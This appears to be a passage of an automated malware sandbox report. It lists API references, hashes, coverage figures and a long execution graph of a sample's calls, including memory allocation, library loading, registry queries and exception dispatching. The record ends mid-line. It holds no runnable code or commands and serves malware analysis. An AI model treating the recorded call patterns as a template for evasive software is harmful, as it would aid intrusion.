                                                    • GetSystemMetrics.USER32(0000003C), ref: 0764B3C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: t~9O
                                                    • API String ID: 4116985748-1938914358
                                                    • Opcode ID: fd8216f0678e87c6582d1791b81c27421bd65dbb16cef9202ad14386dbc07a9f
                                                    • Instruction ID: 297d9f2be349866a72cf16a2099d4d7425776ff05c4b850d3ecb3451cb2d8563
                                                    • Opcode Fuzzy Hash: fd8216f0678e87c6582d1791b81c27421bd65dbb16cef9202ad14386dbc07a9f
                                                    • Instruction Fuzzy Hash: D52146B08003498FCB11CFAAD0487DEBFF4EF49318F14884AD559AB740C3796945CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemMetrics.USER32(00000022), ref: 0764B45E
                                                    • GetSystemMetrics.USER32(00000023), ref: 0764B498
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: t~9O
                                                    • API String ID: 4116985748-1938914358
                                                    • Opcode ID: 975d79485e3a0beb009799645ccfa2b1ee2834f192812760c85a30ec1b4529be
                                                    • Instruction ID: c4a7863fb55afdea19fcb49b9c92d9d5d14b71f59485af7bf154eef72d050d57
                                                    • Opcode Fuzzy Hash: 975d79485e3a0beb009799645ccfa2b1ee2834f192812760c85a30ec1b4529be
                                                    • Instruction Fuzzy Hash: F42157B08043458FDB20DFAAD0497DEBFF0AB08314F14841ED059A7744C3796588CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:22.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.4%
                                                    Total number of Nodes:774
                                                    Total number of Limit Nodes:35
                                                    execution_graph 43058 6a1e000 43061 6a1e050 43058->43061 43062 6a1e0b8 CreateWindowExW 43061->43062 43064 6a1e17a 43062->43064 43065 6a1fc40 DuplicateHandle 43066 6a1fcdc 43065->43066 43067 f64d50 43068 f64d64 43067->43068 43071 f653a2 43068->43071 43069 f64d6d 43073 f653ab 43071->43073 43077 f65584 43071->43077 43081 f65479 43071->43081 43085 f65488 43071->43085 43089 f6559e 43071->43089 43073->43069 43078 f65537 43077->43078 43079 f655c3 43078->43079 43093 f6587f 43078->43093 43082 f65488 43081->43082 43083 f655c3 43082->43083 43084 f6587f 2 API calls 43082->43084 43084->43083 43086 f654cc 43085->43086 43087 f655c3 43086->43087 43088 f6587f 2 API calls 43086->43088 43088->43087 43090 f655b1 43089->43090 43091 f655c3 43089->43091 43092 f6587f 2 API calls 43090->43092 43092->43091 43094 f6589e 43093->43094 43098 f658e0 43094->43098 43102 f658cf 43094->43102 43095 f658ae 43095->43079 43099 f6591a 43098->43099 43100 f65944 RtlEncodePointer 43099->43100 43101 f6596d 43099->43101 43100->43101 43101->43095 43103 f658de 43102->43103 43104 f65944 RtlEncodePointer 43103->43104 43105 f6596d 43103->43105 43104->43105 43105->43095 43106 f6bcb8 43107 f6bcd6 43106->43107 43110 f6b894 43107->43110 43109 f6bd0d 43112 f6d7d8 LoadLibraryA 43110->43112 43113 f6d8ba 43112->43113 43114 f60b58 43115 f60b99 Sleep 43114->43115 43116 f60bcc 43115->43116 43117 f60448 43118 f60455 43117->43118 43122 f60820 43118->43122 43132 f60868 43118->43132 43119 f6045b 43123 f60818 43122->43123 43123->43122 43124 f609c7 43123->43124 43125 f60a53 VirtualAllocExNuma 43123->43125 43142 5c96739 43123->43142 43148 5c96748 43123->43148 43154 f627e8 43123->43154 43157 f627d8 43123->43157 43124->43119 43127 f60b1b 43125->43127 43127->43119 43133 f60818 43132->43133 43133->43132 43134 f609c7 43133->43134 43135 f60a53 VirtualAllocExNuma 43133->43135 43138 5c96739 49 API calls 43133->43138 43139 5c96748 49 API calls 43133->43139 43140 f627e8 6 API calls 43133->43140 43141 f627d8 6 API calls 43133->43141 43134->43119 43137 f60b1b 43135->43137 43137->43119 43138->43133 43139->43133 43140->43133 43141->43133 43143 5c96763 43142->43143 43144 5c96be7 43143->43144 43160 5c97588 43143->43160 43203 5c9764c 43143->43203 43288 5c97578 43143->43288 43144->43123 43149 5c96763 43148->43149 43150 5c96be7 43149->43150 43151 5c97588 49 API calls 43149->43151 43152 5c97578 49 API calls 43149->43152 43153 5c9764c 49 API calls 43149->43153 43150->43123 43151->43149 43152->43149 43153->43149 43910 f62d21 43154->43910 43155 f627f3 43155->43123 43158 f627f3 43157->43158 43159 f62d21 6 API calls 43157->43159 43158->43123 43159->43158 43162 5c97590 43160->43162 43161 5c97644 43161->43143 43162->43161 43332 5c98b31 43162->43332 43340 5c9873e 43162->43340 43351 5c98aa4 43162->43351 43359 5c989a2 43162->43359 43367 5c98a23 43162->43367 43375 5c98da1 43162->43375 43379 5c985a9 43162->43379 43393 5c98897 43162->43393 43401 5c98414 43162->43401 43421 5c9849e 43162->43421 43441 5c9851f 43162->43441 43461 5c98d1d 43162->43461 43467 5c98918 43162->43467 43475 5c98398 KiUserExceptionDispatcher 43162->43475 43495 5c98c99 43162->43495 43503 5c98783 43162->43503 43511 5c9880d 43162->43511 43519 5c98c09 43162->43519 43527 5c98b79 43162->43527 43535 5c986f9 43162->43535 43549 5c989e7 43162->43549 43557 5c98564 43162->43557 43571 5c984e3 43162->43571 43591 5c98ce1 43162->43591 43597 5c985ee 43162->43597 43611 5c9866f 43162->43611 43625 5c98ae9 43162->43625 43633 5c98de9 43162->43633 43637 5c98852 43162->43637 43645 5c98c51 43162->43645 43653 5c98a5f 43162->43653 43661 5c988dc 43162->43661 43669 5c9895d 43162->43669 43677 5c98d59 43162->43677 43681 5c98459 43162->43681 43701 5c98bc1 43162->43701 43709 5c983cf 43162->43709 43729 5c987c8 43162->43729 43737 5c986b4 43162->43737 43751 5c98633 43162->43751 43204 5c9760a 43203->43204 43205 5c97687 43204->43205 43206 5c97590 43204->43206 43208 5c987c8 9 API calls 43204->43208 43209 5c983cf 9 API calls 43204->43209 43210 5c98bc1 9 API calls 43204->43210 43211 5c98459 9 API calls 43204->43211 43212 5c98d59 KiUserExceptionDispatcher 43204->43212 43213 5c9895d 9 API calls 43204->43213 43214 5c988dc 9 API calls 43204->43214 43215 5c98a5f 9 API calls 43204->43215 43216 5c98c51 9 API calls 43204->43216 43217 5c98852 9 API calls 43204->43217 43218 5c98de9 KiUserExceptionDispatcher 43204->43218 43219 5c98ae9 9 API calls 43204->43219 43220 5c9866f 9 API calls 43204->43220 43221 5c985ee 9 API calls 43204->43221 43222 5c98ce1 3 API calls 43204->43222 43223 5c984e3 9 API calls 43204->43223 43224 5c98564 9 API calls 43204->43224 43225 5c989e7 9 API calls 43204->43225 43226 5c986f9 9 API calls 43204->43226 43227 5c98b79 9 API calls 43204->43227 43228 5c98c09 9 API calls 43204->43228 43229 5c9880d 9 API calls 43204->43229 43230 5c98783 9 API calls 43204->43230 43231 5c98c99 9 API calls 43204->43231 43232 5c98398 10 API calls 43204->43232 43233 5c98918 9 API calls 43204->43233 43234 5c98d1d 3 API calls 43204->43234 43235 5c9851f 9 API calls 43204->43235 43236 5c9849e 9 API calls 43204->43236 43237 5c98414 9 API calls 43204->43237 43238 5c98897 9 API calls 43204->43238 43239 5c985a9 9 API calls 43204->43239 43240 5c98da1 KiUserExceptionDispatcher 43204->43240 43241 5c98a23 9 API calls 43204->43241 43242 5c989a2 9 API calls 43204->43242 43243 5c98aa4 9 API calls 43204->43243 43244 5c9873e 9 API calls 43204->43244 43245 5c98b31 9 API calls 43204->43245 43246 5c98633 9 API calls 43204->43246 43247 5c986b4 9 API calls 43204->43247 43207 5c97644 43206->43207 43248 5c987c8 9 API calls 43206->43248 43249 5c983cf 9 API calls 43206->43249 43250 5c98bc1 9 API calls 43206->43250 43251 5c98459 9 API calls 43206->43251 43252 5c98d59 KiUserExceptionDispatcher 43206->43252 43253 5c9895d 9 API calls 43206->43253 43254 5c988dc 9 API calls 43206->43254 43255 5c98a5f 9 API calls 43206->43255 43256 5c98c51 9 API calls 43206->43256 43257 5c98852 9 API calls 43206->43257 43258 5c98de9 KiUserExceptionDispatcher 43206->43258 43259 5c98ae9 9 API calls 43206->43259 43260 5c9866f 9 API calls 43206->43260 43261 5c985ee 9 API calls 43206->43261 43262 5c98ce1 3 API calls 43206->43262 43263 5c984e3 9 API calls 43206->43263 43264 5c98564 9 API calls 43206->43264 43265 5c989e7 9 API calls 43206->43265 43266 5c986f9 9 API calls 43206->43266 43267 5c98b79 9 API calls 43206->43267 43268 5c98c09 9 API calls 43206->43268 43269 5c9880d 9 API calls 43206->43269 43270 5c98783 9 API calls 43206->43270 43271 5c98c99 9 API calls 43206->43271 43272 5c98398 10 API calls 43206->43272 43273 5c98918 9 API calls 43206->43273 43274 5c98d1d 3 API calls 43206->43274 43275 5c9851f 9 API calls 43206->43275 43276 5c9849e 9 API calls 43206->43276 43277 5c98414 9 API calls 43206->43277 43278 5c98897 9 API calls 43206->43278 43279 5c985a9 9 API calls 43206->43279 43280 5c98da1 KiUserExceptionDispatcher 43206->43280 43281 5c98a23 9 API calls 43206->43281 43282 5c989a2 9 API calls 43206->43282 43283 5c98aa4 9 API calls 43206->43283 43284 5c9873e 9 API calls 43206->43284 43285 5c98b31 9 API calls 43206->43285 43286 5c98633 9 API calls 43206->43286 43287 5c986b4 9 API calls 43206->43287 43207->43143 43208->43206 43209->43206 43210->43206 43211->43206 43212->43206 43213->43206 43214->43206 43215->43206 43216->43206 43217->43206 43218->43206 43219->43206 43220->43206 43221->43206 43222->43206 43223->43206 43224->43206 43225->43206 43226->43206 43227->43206 43228->43206 43229->43206 43230->43206 43231->43206 43232->43206 43233->43206 43234->43206 43235->43206 43236->43206 43237->43206 43238->43206 43239->43206 43240->43206 43241->43206 43242->43206 43243->43206 43244->43206 43245->43206 43246->43206 43247->43206 43248->43206 43249->43206 43250->43206 43251->43206 43252->43206 43253->43206 43254->43206 43255->43206 43256->43206 43257->43206 43258->43206 43259->43206 43260->43206 43261->43206 43262->43206 43263->43206 43264->43206 43265->43206 43266->43206 43267->43206 43268->43206 43269->43206 43270->43206 43271->43206 43272->43206 43273->43206 43274->43206 43275->43206 43276->43206 43277->43206 43278->43206 43279->43206 43280->43206 43281->43206 43282->43206 43283->43206 43284->43206 43285->43206 43286->43206 43287->43206 43289 5c97542 43288->43289 43291 5c9757b 43288->43291 43289->43143 43290 5c97644 43290->43143 43291->43290 43292 5c987c8 9 API calls 43291->43292 43293 5c983cf 9 API calls 43291->43293 43294 5c98bc1 9 API calls 43291->43294 43295 5c98459 9 API calls 43291->43295 43296 5c98d59 KiUserExceptionDispatcher 43291->43296 43297 5c9895d 9 API calls 43291->43297 43298 5c988dc 9 API calls 43291->43298 43299 5c98a5f 9 API calls 43291->43299 43300 5c98c51 9 API calls 43291->43300 43301 5c98852 9 API calls 43291->43301 43302 5c98de9 KiUserExceptionDispatcher 43291->43302 43303 5c98ae9 9 API calls 43291->43303 43304 5c9866f 9 API calls 43291->43304 43305 5c985ee 9 API calls 43291->43305 43306 5c98ce1 3 API calls 43291->43306 43307 5c984e3 9 API calls 43291->43307 43308 5c98564 9 API calls 43291->43308 43309 5c989e7 9 API calls 43291->43309 43310 5c986f9 9 API calls 43291->43310 43311 5c98b79 9 API calls 43291->43311 43312 5c98c09 9 API calls 43291->43312 43313 5c9880d 9 API calls 43291->43313 43314 5c98783 9 API calls 43291->43314 43315 5c98c99 9 API calls 43291->43315 43316 5c98398 10 API calls 43291->43316 43317 5c98918 9 API calls 43291->43317 43318 5c98d1d 3 API calls 43291->43318 43319 5c9851f 9 API calls 43291->43319 43320 5c9849e 9 API calls 43291->43320 43321 5c98414 9 API calls 43291->43321 43322 5c98897 9 API calls 43291->43322 43323 5c985a9 9 API calls 43291->43323 43324 5c98da1 KiUserExceptionDispatcher 43291->43324 43325 5c98a23 9 API calls 43291->43325 43326 5c989a2 9 API calls 43291->43326 43327 5c98aa4 9 API calls 43291->43327 43328 5c9873e 9 API calls 43291->43328 43329 5c98b31 9 API calls 43291->43329 43330 5c98633 9 API calls 43291->43330 43331 5c986b4 9 API calls 43291->43331 43292->43291 43293->43291 43294->43291 43295->43291 43296->43291 43297->43291 43298->43291 43299->43291 43300->43291 43301->43291 43302->43291 43303->43291 43304->43291 43305->43291 43306->43291 43307->43291 43308->43291 43309->43291 43310->43291 43311->43291 43312->43291 43313->43291 43314->43291 43315->43291 43316->43291 43317->43291 43318->43291 43319->43291 43320->43291 43321->43291 43322->43291 43323->43291 43324->43291 43325->43291 43326->43291 43327->43291 43328->43291 43329->43291 43330->43291 43331->43291 43333 5c98b42 43332->43333 43765 6a13298 43333->43765 43334 5c98cc6 43339 6a1c688 RegOpenKeyExW RegQueryValueExW 43334->43339 43335 5c98d3e 43336 5c98e10 KiUserExceptionDispatcher 43335->43336 43337 5c98e2f 43336->43337 43337->43162 43339->43335 43341 5c9874f 43340->43341 43866 695cc08 43341->43866 43870 695cba8 43341->43870 43342 5c98768 43347 6a13298 6 API calls 43342->43347 43343 5c98cc6 43875 6a1c688 43343->43875 43344 5c98d3e 43345 5c98e10 KiUserExceptionDispatcher 43344->43345 43346 5c98e2f 43345->43346 43346->43162 43347->43343 43352 5c98ab5 43351->43352 43358 6a13298 6 API calls 43352->43358 43353 5c98cc6 43357 6a1c688 2 API calls 43353->43357 43354 5c98d3e 43355 5c98e10 KiUserExceptionDispatcher 43354->43355 43356 5c98e2f 43355->43356 43356->43162 43357->43354 43358->43353 43360 5c989b3 43359->43360 43365 6a13298 6 API calls 43360->43365 43361 5c98cc6 43366 6a1c688 2 API calls 43361->43366 43362 5c98d3e 43363 5c98e10 KiUserExceptionDispatcher 43362->43363 43364 5c98e2f 43363->43364 43364->43162 43365->43361 43366->43362 43368 5c98a34 43367->43368 43374 6a13298 6 API calls 43368->43374 43369 5c98cc6 43373 6a1c688 2 API calls 43369->43373 43370 5c98d3e 43371 5c98e10 KiUserExceptionDispatcher 43370->43371 43372 5c98e2f 43371->43372 43372->43162 43373->43370 43374->43369 43376 5c98db2 KiUserExceptionDispatcher 43375->43376 43378 5c98e2f 43376->43378 43378->43162 43380 5c985ba 43379->43380 43391 695cc08 6 API calls 43380->43391 43392 695cba8 6 API calls 43380->43392 43381 5c98723 43387 695cc08 6 API calls 43381->43387 43388 695cba8 6 API calls 43381->43388 43382 5c98768 43389 6a13298 6 API calls 43382->43389 43383 5c98cc6 43390 6a1c688 2 API calls 43383->43390 43384 5c98d3e 43385 5c98e10 KiUserExceptionDispatcher 43384->43385 43386 5c98e2f 43385->43386 43386->43162 43387->43382 43388->43382 43389->43383 43390->43384 43391->43381 43392->43381 43394 5c988a8 43393->43394 43399 6a13298 6 API calls 43394->43399 43395 5c98cc6 43400 6a1c688 2 API calls 43395->43400 43396 5c98d3e 43397 5c98e10 KiUserExceptionDispatcher 43396->43397 43398 5c98e2f 43397->43398 43398->43162 43399->43395 43400->43396 43402 5c98425 43401->43402 43885 6958cd7 43402->43885 43891 6959092 43402->43891 43896 6958d38 43402->43896 43901 695906a 43402->43901 43906 6959100 43402->43906 43403 5c98549 43411 695cc08 6 API calls 43403->43411 43412 695cba8 6 API calls 43403->43412 43404 5c98723 43413 695cc08 6 API calls 43404->43413 43414 695cba8 6 API calls 43404->43414 43405 5c98768 43420 6a13298 6 API calls 43405->43420 43406 5c98cc6 43410 6a1c688 2 API calls 43406->43410 43407 5c98d3e 43408 5c98e10 KiUserExceptionDispatcher 43407->43408 43409 5c98e2f 43408->43409 43409->43162 43410->43407 43411->43404 43412->43404 43413->43405 43414->43405 43420->43406 43422 5c984af 43421->43422 43430 6958cd7 6 API calls 43422->43430 43431 6959100 6 API calls 43422->43431 43432 6959092 6 API calls 43422->43432 43433 6958d38 6 API calls 43422->43433 43434 695906a 6 API calls 43422->43434 43423 5c98549 43437 695cc08 6 API calls 43423->43437 43438 695cba8 6 API calls 43423->43438 43424 5c98723 43439 695cc08 6 API calls 43424->43439 43440 695cba8 6 API calls 43424->43440 43425 5c98768 43435 6a13298 6 API calls 43425->43435 43426 5c98cc6 43436 6a1c688 2 API calls 43426->43436 43427 5c98d3e 43428 5c98e10 KiUserExceptionDispatcher 43427->43428 43429 5c98e2f 43428->43429 43429->43162 43430->43423 43431->43423 43432->43423 43433->43423 43434->43423 43435->43426 43436->43427 43437->43424 43438->43424 43439->43425 43440->43425 43442 5c98530 43441->43442 43450 6958cd7 6 API calls 43442->43450 43451 6959100 6 API calls 43442->43451 43452 6959092 6 API calls 43442->43452 43453 6958d38 6 API calls 43442->43453 43454 695906a 6 API calls 43442->43454 43443 5c98549 43457 695cc08 6 API calls 43443->43457 43458 695cba8 6 API calls 43443->43458 43444 5c98723 43459 695cc08 6 API calls 43444->43459 43460 695cba8 6 API calls 43444->43460 43445 5c98768 43455 6a13298 6 API calls 43445->43455 43446 5c98cc6 43456 6a1c688 2 API calls 43446->43456 43447 5c98d3e 43448 5c98e10 KiUserExceptionDispatcher 43447->43448 43449 5c98e2f 43448->43449 43449->43162 43450->43443 43451->43443 43452->43443 43453->43443 43454->43443 43455->43446 43456->43447 43457->43444 43458->43444 43459->43445 43460->43445 43462 5c98d2e 43461->43462 43466 6a1c688 2 API calls 43462->43466 43463 5c98d3e 43464 5c98e10 KiUserExceptionDispatcher 43463->43464 43465 5c98e2f 43464->43465 43465->43162 43466->43463 43468 5c98929 43467->43468 43473 6a13298 6 API calls 43468->43473 43469 5c98cc6 43474 6a1c688 2 API calls 43469->43474 43470 5c98d3e 43471 5c98e10 KiUserExceptionDispatcher 43470->43471 43472 5c98e2f 43471->43472 43472->43162 43473->43469 43474->43470 43476 5c983b4 43475->43476 43484 6958cd7 6 API calls 43476->43484 43485 6959100 6 API calls 43476->43485 43486 6959092 6 API calls 43476->43486 43487 6958d38 6 API calls 43476->43487 43488 695906a 6 API calls 43476->43488 43477 5c98549 43491 695cc08 6 API calls 43477->43491 43492 695cba8 6 API calls 43477->43492 43478 5c98723 43493 695cc08 6 API calls 43478->43493 43494 695cba8 6 API calls 43478->43494 43479 5c98768 43489 6a13298 6 API calls 43479->43489 43480 5c98cc6 43490 6a1c688 2 API calls 43480->43490 43481 5c98d3e 43482 5c98e10 KiUserExceptionDispatcher 43481->43482 43483 5c98e2f 43482->43483 43483->43162 43484->43477 43485->43477 43486->43477 43487->43477 43488->43477 43489->43480 43490->43481 43491->43478 43492->43478 43493->43479 43494->43479 43496 5c98caa 43495->43496 43502 6a13298 6 API calls 43496->43502 43497 5c98cc6 43501 6a1c688 2 API calls 43497->43501 43498 5c98d3e 43499 5c98e10 KiUserExceptionDispatcher 43498->43499 43500 5c98e2f 43499->43500 43500->43162 43501->43498 43502->43497 43504 5c98794 43503->43504 43509 6a13298 6 API calls 43504->43509 43505 5c98cc6 43510 6a1c688 2 API calls 43505->43510 43506 5c98d3e 43507 5c98e10 KiUserExceptionDispatcher 43506->43507 43508 5c98e2f 43507->43508 43508->43162 43509->43505 43510->43506 43512 5c9881e 43511->43512 43518 6a13298 6 API calls 43512->43518 43513 5c98cc6 43517 6a1c688 2 API calls 43513->43517 43514 5c98d3e 43515 5c98e10 KiUserExceptionDispatcher 43514->43515 43516 5c98e2f 43515->43516 43516->43162 43517->43514 43518->43513 43520 5c98c1a 43519->43520 43526 6a13298 6 API calls 43520->43526 43521 5c98cc6 43525 6a1c688 2 API calls 43521->43525 43522 5c98d3e 43523 5c98e10 KiUserExceptionDispatcher 43522->43523 43524 5c98e2f 43523->43524 43524->43162 43525->43522 43526->43521 43528 5c98b8a 43527->43528 43533 6a13298 6 API calls 43528->43533 43529 5c98cc6 43534 6a1c688 2 API calls 43529->43534 43530 5c98d3e 43531 5c98e10 KiUserExceptionDispatcher 43530->43531 43532 5c98e2f 43531->43532 43532->43162 43533->43529 43534->43530 43536 5c9870a 43535->43536 43544 695cc08 6 API calls 43536->43544 43545 695cba8 6 API calls 43536->43545 43537 5c98723 43546 695cc08 6 API calls 43537->43546 43547 695cba8 6 API calls 43537->43547 43538 5c98768 43548 6a13298 6 API calls 43538->43548 43539 5c98cc6 43543 6a1c688 2 API calls 43539->43543 43540 5c98d3e 43541 5c98e10 KiUserExceptionDispatcher 43540->43541 43542 5c98e2f 43541->43542 43542->43162 43543->43540 43544->43537 43545->43537 43546->43538 43547->43538 43548->43539 43550 5c989f8 43549->43550 43556 6a13298 6 API calls 43550->43556 43551 5c98cc6 43555 6a1c688 2 API calls 43551->43555 43552 5c98d3e 43553 5c98e10 KiUserExceptionDispatcher 43552->43553 43554 5c98e2f 43553->43554 43554->43162 43555->43552 43556->43551 43558 5c98575 43557->43558 43567 695cc08 6 API calls 43558->43567 43568 695cba8 6 API calls 43558->43568 43559 5c98723 43569 695cc08 6 API calls 43559->43569 43570 695cba8 6 API calls 43559->43570 43560 5c98768 43565 6a13298 6 API calls 43560->43565 43561 5c98cc6 43566 6a1c688 2 API calls 43561->43566 43562 5c98d3e 43563 5c98e10 KiUserExceptionDispatcher 43562->43563 43564 5c98e2f 43563->43564 43564->43162 43565->43561 43566->43562 43567->43559 43568->43559 43569->43560 43570->43560 43572 5c984f4 43571->43572 43586 6958cd7 6 API calls 43572->43586 43587 6959100 6 API calls 43572->43587 43588 6959092 6 API calls 43572->43588 43589 6958d38 6 API calls 43572->43589 43590 695906a 6 API calls 43572->43590 43573 5c98549 43582 695cc08 6 API calls 43573->43582 43583 695cba8 6 API calls 43573->43583 43574 5c98723 43584 695cc08 6 API calls 43574->43584 43585 695cba8 6 API calls 43574->43585 43575 5c98768 43580 6a13298 6 API calls 43575->43580 43576 5c98cc6 43581 6a1c688 2 API calls 43576->43581 43577 5c98d3e 43578 5c98e10 KiUserExceptionDispatcher 43577->43578 43579 5c98e2f 43578->43579 43579->43162 43580->43576 43581->43577 43582->43574 43583->43574 43584->43575 43585->43575 43586->43573 43587->43573 43588->43573 43589->43573 43590->43573 43592 5c98cf2 43591->43592 43596 6a1c688 2 API calls 43592->43596 43593 5c98d3e 43594 5c98e10 KiUserExceptionDispatcher 43593->43594 43595 5c98e2f 43594->43595 43595->43162 43596->43593 43598 5c985ff 43597->43598 43607 695cc08 6 API calls 43598->43607 43608 695cba8 6 API calls 43598->43608 43599 5c98723 43609 695cc08 6 API calls 43599->43609 43610 695cba8 6 API calls 43599->43610 43600 5c98768 43605 6a13298 6 API calls 43600->43605 43601 5c98cc6 43606 6a1c688 2 API calls 43601->43606 43602 5c98d3e 43603 5c98e10 KiUserExceptionDispatcher 43602->43603 43604 5c98e2f 43603->43604 43604->43162 43605->43601 43606->43602 43607->43599 43608->43599 43609->43600 43610->43600 43612 5c98680 43611->43612 43621 695cc08 6 API calls 43612->43621 43622 695cba8 6 API calls 43612->43622 43613 5c98723 43623 695cc08 6 API calls 43613->43623 43624 695cba8 6 API calls 43613->43624 43614 5c98768 43619 6a13298 6 API calls 43614->43619 43615 5c98cc6 43620 6a1c688 2 API calls 43615->43620 43616 5c98d3e 43617 5c98e10 KiUserExceptionDispatcher 43616->43617 43618 5c98e2f 43617->43618 43618->43162 43619->43615 43620->43616 43621->43613 43622->43613 43623->43614 43624->43614 43626 5c98afa 43625->43626 43632 6a13298 6 API calls 43626->43632 43627 5c98cc6 43631 6a1c688 2 API calls 43627->43631 43628 5c98d3e 43629 5c98e10 KiUserExceptionDispatcher 43628->43629 43630 5c98e2f 43629->43630 43630->43162 43631->43628 43632->43627 43634 5c98dfa KiUserExceptionDispatcher 43633->43634 43636 5c98e2f 43634->43636 43636->43162 43638 5c98863 43637->43638 43643 6a13298 6 API calls 43638->43643 43639 5c98cc6 43644 6a1c688 2 API calls 43639->43644 43640 5c98d3e 43641 5c98e10 KiUserExceptionDispatcher 43640->43641 43642 5c98e2f 43641->43642 43642->43162 43643->43639 43644->43640 43646 5c98c62 43645->43646 43652 6a13298 6 API calls 43646->43652 43647 5c98cc6 43651 6a1c688 2 API calls 43647->43651 43648 5c98d3e 43649 5c98e10 KiUserExceptionDispatcher 43648->43649 43650 5c98e2f 43649->43650 43650->43162 43651->43648 43652->43647 43654 5c98a70 43653->43654 43659 6a13298 6 API calls 43654->43659 43655 5c98cc6 43660 6a1c688 2 API calls 43655->43660 43656 5c98d3e 43657 5c98e10 KiUserExceptionDispatcher 43656->43657 43658 5c98e2f 43657->43658 43658->43162 43659->43655 43660->43656 43662 5c988ed 43661->43662 43667 6a13298 6 API calls 43662->43667 43663 5c98cc6 43668 6a1c688 2 API calls 43663->43668 43664 5c98d3e 43665 5c98e10 KiUserExceptionDispatcher 43664->43665 43666 5c98e2f 43665->43666 43666->43162 43667->43663 43668->43664 43670 5c9896e 43669->43670 43675 6a13298 6 API calls 43670->43675 43671 5c98cc6 43676 6a1c688 2 API calls 43671->43676 43672 5c98d3e 43673 5c98e10 KiUserExceptionDispatcher 43672->43673 43674 5c98e2f 43673->43674 43674->43162 43675->43671 43676->43672 43678 5c98d6a 43677->43678 43679 5c98e10 KiUserExceptionDispatcher 43678->43679 43680 5c98e2f 43679->43680 43680->43162 43682 5c9846a 43681->43682 43695 6958cd7 6 API calls 43682->43695 43696 6959100 6 API calls 43682->43696 43697 6959092 6 API calls 43682->43697 43698 6958d38 6 API calls 43682->43698 43699 695906a 6 API calls 43682->43699 43683 5c98549 43691 695cc08 6 API calls 43683->43691 43692 695cba8 6 API calls 43683->43692 43684 5c98723 43693 695cc08 6 API calls 43684->43693 43694 695cba8 6 API calls 43684->43694 43685 5c98768 43700 6a13298 6 API calls 43685->43700 43686 5c98cc6 43690 6a1c688 2 API calls 43686->43690 43687 5c98d3e 43688 5c98e10 KiUserExceptionDispatcher 43687->43688 43689 5c98e2f 43688->43689 43689->43162 43690->43687 43691->43684 43692->43684 43693->43685 43694->43685 43695->43683 43696->43683 43697->43683 43698->43683 43699->43683 43700->43686 43702 5c98bd2 43701->43702 43707 6a13298 6 API calls 43702->43707 43703 5c98cc6 43708 6a1c688 2 API calls 43703->43708 43704 5c98d3e 43705 5c98e10 KiUserExceptionDispatcher 43704->43705 43706 5c98e2f 43705->43706 43706->43162 43707->43703 43708->43704 43710 5c983e0 43709->43710 43724 6958cd7 6 API calls 43710->43724 43725 6959100 6 API calls 43710->43725 43726 6959092 6 API calls 43710->43726 43727 6958d38 6 API calls 43710->43727 43728 695906a 6 API calls 43710->43728 43711 5c98549 43720 695cc08 6 API calls 43711->43720 43721 695cba8 6 API calls 43711->43721 43712 5c98723 43722 695cc08 6 API calls 43712->43722 43723 695cba8 6 API calls 43712->43723 43713 5c98768 43718 6a13298 6 API calls 43713->43718 43714 5c98cc6 43719 6a1c688 2 API calls 43714->43719 43715 5c98d3e 43716 5c98e10 KiUserExceptionDispatcher 43715->43716 43717 5c98e2f 43716->43717 43717->43162 43718->43714 43719->43715 43720->43712 43721->43712 43722->43713 43723->43713 43724->43711 43725->43711 43726->43711 43727->43711 43728->43711 43730 5c987d9 43729->43730 43735 6a13298 6 API calls 43730->43735 43731 5c98cc6 43736 6a1c688 2 API calls 43731->43736 43732 5c98d3e 43733 5c98e10 KiUserExceptionDispatcher 43732->43733 43734 5c98e2f 43733->43734 43734->43162 43735->43731 43736->43732 43738 5c986c5 43737->43738 43747 695cc08 6 API calls 43738->43747 43748 695cba8 6 API calls 43738->43748 43739 5c98723 43749 695cc08 6 API calls 43739->43749 43750 695cba8 6 API calls 43739->43750 43740 5c98768 43745 6a13298 6 API calls 43740->43745 43741 5c98cc6 43746 6a1c688 2 API calls 43741->43746 43742 5c98d3e 43743 5c98e10 KiUserExceptionDispatcher 43742->43743 43744 5c98e2f 43743->43744 43744->43162 43745->43741 43746->43742 43747->43739 43748->43739 43749->43740 43750->43740 43752 5c98644 43751->43752 43761 695cc08 6 API calls 43752->43761 43762 695cba8 6 API calls 43752->43762 43753 5c98723 43763 695cc08 6 API calls 43753->43763 43764 695cba8 6 API calls 43753->43764 43754 5c98768 43759 6a13298 6 API calls 43754->43759 43755 5c98cc6 43760 6a1c688 2 API calls 43755->43760 43756 5c98d3e 43757 5c98e10 KiUserExceptionDispatcher 43756->43757 43758 5c98e2f 43757->43758 43758->43162 43759->43755 43760->43756 43761->43753 43762->43753 43763->43754 43764->43754 43766 6a132b6 43765->43766 43767 6a13552 43766->43767 43770 6a15a40 43766->43770 43774 6a17820 43766->43774 43771 6a15a56 43770->43771 43772 6a15c47 43771->43772 43778 f639e1 43771->43778 43772->43766 43776 6a1782f 43774->43776 43775 6a1785e 43775->43766 43776->43775 43857 6a18461 43776->43857 43779 f639ea 43778->43779 43780 f63aa2 43779->43780 43785 6959d4d 43779->43785 43789 6959c88 43779->43789 43795 6959c98 43779->43795 43801 6959ed8 43779->43801 43780->43772 43788 6959d0a 43785->43788 43787 6959f10 43787->43780 43788->43787 43805 6955730 43788->43805 43790 6959cb9 43789->43790 43791 6955a98 LdrInitializeThunk 43790->43791 43794 6959cd1 43791->43794 43792 6955730 6 API calls 43792->43794 43793 6959f10 43793->43780 43794->43792 43794->43793 43796 6959cb9 43795->43796 43797 6955a98 LdrInitializeThunk 43796->43797 43798 6959cd1 43797->43798 43799 6955730 6 API calls 43798->43799 43800 6959f10 43798->43800 43799->43798 43800->43780 43803 6959d0a 43801->43803 43802 6955730 6 API calls 43802->43803 43803->43802 43804 